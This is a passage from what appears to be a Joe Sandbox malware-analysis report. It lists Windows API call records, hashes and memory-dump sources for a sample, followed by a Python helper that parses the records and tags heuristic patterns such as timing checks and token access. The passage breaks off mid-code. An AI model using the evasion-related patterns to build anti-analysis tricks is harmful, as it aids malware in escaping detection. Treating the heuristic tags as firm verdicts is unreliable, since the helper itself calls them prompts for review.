                        • Opcode Fuzzy Hash: 775968df65c5cc5b038ec408aac648ddf38c2188eda5e7f41a6c5f1c98520a1e
                        • Instruction Fuzzy Hash: B801ADB220A61A7FF6212AB86DD0FE7671CEFC17B8F740725F521A11D2DB608C005160
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 009E1A47
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A59
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A6F
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
                        • Instruction ID: e82ecf9922219db65762784fcee6ebd7ff602adee1aab3dc3212097b915b1ac4
                        • Opcode Fuzzy Hash: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
                        • Instruction Fuzzy Hash: 0D11393AD01219FFEF11DBA5CD85FADBB78EB08750F2000A1EA00B7290D6716E50DB94
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 009EE1FD
                        • MessageBoxW.USER32(?,?,?,?), ref: 009EE230
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009EE246
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009EE24D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
                        • Instruction ID: 772f70c51c918d8591f6f8c7366fc7fc4240ae5f78ed25b4be88e948d1d26551
                        • Opcode Fuzzy Hash: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
                        • Instruction Fuzzy Hash: 3B1104B6904254BBC702DFE89C09BEE7FACAB85331F008215F924E7390D2B0CE0587A0
                        APIs
                        • CreateThread.KERNEL32(00000000,?,009ACFF9,00000000,00000004,00000000), ref: 009AD218
                        • GetLastError.KERNEL32 ref: 009AD224
                        • __dosmaperr.LIBCMT ref: 009AD22B
                        • ResumeThread.KERNEL32(00000000), ref: 009AD249
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                        • String ID:
                        • API String ID: 173952441-0
                        • Opcode ID: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
                        • Instruction ID: 3dc192258b9da97fcf42498adef3a6c843b4fd56d38215207e64bd98d85ddcef
                        • Opcode Fuzzy Hash: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
                        • Instruction Fuzzy Hash: 6801C076846214BBCB216BA5DC09BAA7A6DDFC3730F104229FD36965D0DB708901C6E0
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                        • GetStockObject.GDI32(00000011), ref: 00986060
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        • Opcode ID: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
                        • Instruction ID: d9565c9f7d8c06521cae3fffbba5f655c727fc8605a096836f330a70943a401a
                        • Opcode Fuzzy Hash: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
                        • Instruction Fuzzy Hash: A011AD72501508BFEF129FA58C44FEABB6DFF083A4F004205FA1556210D7369C60DBA5
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 009A3B56
                          • Part of subcall function 009A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009A3AD2
                          • Part of subcall function 009A3AA3: ___AdjustPointer.LIBCMT ref: 009A3AED
                        • _UnwindNestedFrames.LIBCMT ref: 009A3B6B
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009A3B7C
                        • CallCatchBlock.LIBVCRUNTIME ref: 009A3BA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction ID: 83401c591d6cd1615c461c3ea846b7023fd8ed85def1b664522ca59c3b3639a8
                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction Fuzzy Hash: 52014C32100148BBDF125E95DC46EEB7F6EEF8A754F058014FE5866121C772E961DBE0
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009813C6,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue), ref: 009B30A5
                        • GetLastError.KERNEL32(?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000,00000364,?,009B2E46), ref: 009B30B1
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000), ref: 009B30BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
                        • Instruction ID: f2bd7504a90a18e6baa275261f1e205ce5fb4be3b19825c8ccb179ea3f92818b
                        • Opcode Fuzzy Hash: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
                        • Instruction Fuzzy Hash: 1001D436745232ABCB31EBB8AD449E77B9CAF05B71B208620F906E7140CB25D902C6E0
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 009E747F
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009E7497
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009E74AC
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009E74CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
                        • Instruction ID: e6c587123b29ebf0dece707a50046b34f721da004d5857b775ad93cfbcf09a48
                        • Opcode Fuzzy Hash: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
                        • Instruction Fuzzy Hash: 5411E1B5249354ABE321CF95DC08F92BBFDEB00B10F108969A616D60A1E770ED04CB52
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0C4
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0E9
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0F3
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
                        • Instruction ID: 2ab6c3a2af349ef04ae78fa24844665ff2b241cbe536016fcb3e434a0b33d5ea
                        • Opcode Fuzzy Hash: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
                        • Instruction Fuzzy Hash: 47115730C4466CE7CF01EFE6E9A87EEBB78BB49321F008186D941B2185CB345A519B51
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
                        • GetCurrentThreadId.KERNEL32 ref: 009E2DDD
                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
                        • Instruction ID: efeca758df7b0f505410aa451231c50a8ec2b907a0acb18beb20be9a5f1cf823
                        • Opcode Fuzzy Hash: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
                        • Instruction Fuzzy Hash: DEE06D715813347AD7215BA39C0DFEB7E6CEB42BB1F005115B205D1080DAA48982C6B0
                        APIs
                          • Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
                          • Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2
                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A18887
                        • LineTo.GDI32(?,?,?), ref: 00A18894
                        • EndPath.GDI32(?), ref: 00A188A4
                        • StrokePath.GDI32(?), ref: 00A188B2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
                        • Instruction ID: b34c254cb9d791bb2eb29e3c573daa5ea3149eba68fa801f20f5022930e69da9
                        • Opcode Fuzzy Hash: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
                        • Instruction Fuzzy Hash: 7CF05E36081258FADB129FD4AC0AFDE3F59AF0A321F448100FA11650E1C7795552CFE9
                        APIs
                        • GetSysColor.USER32(00000008), ref: 009998CC
                        • SetTextColor.GDI32(?,?), ref: 009998D6
                        • SetBkMode.GDI32(?,00000001), ref: 009998E9
                        • GetStockObject.GDI32(00000005), ref: 009998F1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$ModeObjectStockText
                        • String ID:
                        • API String ID: 4037423528-0
                        • Opcode ID: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
                        • Instruction ID: 070b52337383435bbe4da791ec9fecbe24974681176c3bf2fad8e94e7517e296
                        • Opcode Fuzzy Hash: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
                        • Instruction Fuzzy Hash: F8E06D312C4280BADB219BB8BC09BE87F25AB12336F14C31AF6FA580E1C37146419B11
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 009E1634
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E163B
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009E11D9), ref: 009E1648
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E164F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
                        • Instruction ID: 082628541e0723183560936857929a56d71556176caa5b132fa6a76f9082c1f0
                        • Opcode Fuzzy Hash: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
                        • Instruction Fuzzy Hash: A9E08631641211DBD7205FE19D0DBC67B7CBF44BA1F14C808F245C9080D7348542C754
                        APIs
                        • GetDesktopWindow.USER32 ref: 009DD858
                        • GetDC.USER32(00000000), ref: 009DD862
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
                        • ReleaseDC.USER32(?), ref: 009DD8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
                        • Instruction ID: 0d5fc620ee6435c35926b95f4f21ff62fecc13b1e99d66b714ad6fdf09dc78a0
                        • Opcode Fuzzy Hash: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
                        • Instruction Fuzzy Hash: BEE01AB4840204EFCF41EFE0D808AADBBB1FB08320F10E409E81AE7350C7384942AF50
                        APIs
                        • GetDesktopWindow.USER32 ref: 009DD86C
                        • GetDC.USER32(00000000), ref: 009DD876
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
                        • ReleaseDC.USER32(?), ref: 009DD8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
                        • Instruction ID: 8153c61995d979f19ff3f8f798cb50c1ac2fda86cb94dd29fd55b4cd57a4a7a4
                        • Opcode Fuzzy Hash: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
                        • Instruction Fuzzy Hash: 38E092B5C40204EFCF51EFE4D848AADBBB5BB48321B14A449E95AE7250CB385A42AF54
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009F4ED4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Connection_wcslen
                        • String ID: *$LPT
                        • API String ID: 1725874428-3443410124
                        • Opcode ID: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
                        • Instruction ID: f267be5593a9a6c2f48aba80da57fe4908af97222d61508fb9f7c96d7fce3b46
                        • Opcode Fuzzy Hash: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
                        • Instruction Fuzzy Hash: F3918075A002089FCB14DF58C484EBABBF5BF49314F198099E90A9F3A2D735ED85CB91
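The records above share one plain-text shape: an `APIs` list of `Name.MODULE(args), ref: ADDR` lines (some prefixed `Part of subcall function XXXX:`), closed by an `Instruction Fuzzy Hash` line. At the size of this report, reading them one by one is impractical, so the helper below, an added example for this page and not Joe Sandbox code, parses that shape and labels call sequences a reviewer would want to open in the disassembly. The heuristic labels (`timing`, `token`, `input-attach`, `network-share`) are this example's own, not the report's signatures. The `timing` label is deliberately cautious: Sleep bracketed by two QueryPerformanceCounter reads (the record at 009EB0C4) is the shape of an execution-timing check, but a high-resolution delay loop emits the same sequence, so the label points at the comparison that follows the second read rather than asserting anti-debugging. The embedded sample is constructed from three records on this page (009EB0C4, 009E1634, 009F4ED4).

```python
"""Triage helper for the function records in a Joe Sandbox execution-graph listing.

Added example for this report page; not Joe Sandbox code. The heuristic
labels are this example's own, not the report's signatures. It parses API
lines of the form `• Name.MODULE(args), ref: ADDR`, optionally prefixed with
`Part of subcall function XXXX:`, and groups them per record.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:~@$?]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
RECORD_END = "• Instruction Fuzzy Hash:"  # last line of every record in this listing


@dataclass
class Call:
    name: str
    module: str
    ref: str                      # call-site address as printed (hex)
    args: list[str] = field(default_factory=list)
    parent: str | None = None     # set for 'Part of subcall function' entries


@dataclass
class Record:
    calls: list[Call]
    flags: list[str]


def flag_record(calls: list[Call]) -> list[str]:
    """Heuristic labels (this example's own) for API sequences in one record."""
    names = [c.name for c in calls]
    flags = []
    # Sleep bracketed by two QueryPerformanceCounter reads is the shape of an
    # execution-timing check, but an ordinary high-resolution delay loop emits
    # the identical sequence: the label is a prompt to read the comparison
    # after the second read, not a verdict.
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        flags.append("timing")
    if {"OpenProcessToken", "OpenThreadToken"} & set(names):
        flags.append("token")          # inspects its own access token
    if "AttachThreadInput" in names:
        flags.append("input-attach")   # joins another thread's input queue
    if "WNetUseConnectionW" in names:
        flags.append("network-share")  # connects to a network resource
    return flags


def parse_records(text: str) -> list[Record]:
    """Split the listing into records; each closes at its Instruction Fuzzy Hash line."""
    records, current = [], []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.append(Call(m["name"], m["module"], m["ref"], args, m["parent"]))
        elif line.strip().startswith(RECORD_END):
            records.append(Record(current, flag_record(current)))
            current = []
    return records


def summarize(text: str) -> list[dict]:
    """One row per record: first call-site address, API list, heuristic flags."""
    return [
        {
            "entry": rec.calls[0].ref if rec.calls else None,
            "apis": [f"{c.name}.{c.module}" for c in rec.calls],
            "flags": rec.flags,
        }
        for rec in parse_records(text)
    ]


# Constructed sample: three records copied from this report section.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB126
Memory Dump Source
• Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
• Instruction Fuzzy Hash: 47115730C4466CE7CF01EFE6E9A87EEBB78BB49321F008186D941B2185CB345A519B51
APIs
• GetCurrentThread.KERNEL32 ref: 009E1634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009E11D9), ref: 009E1648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E164F
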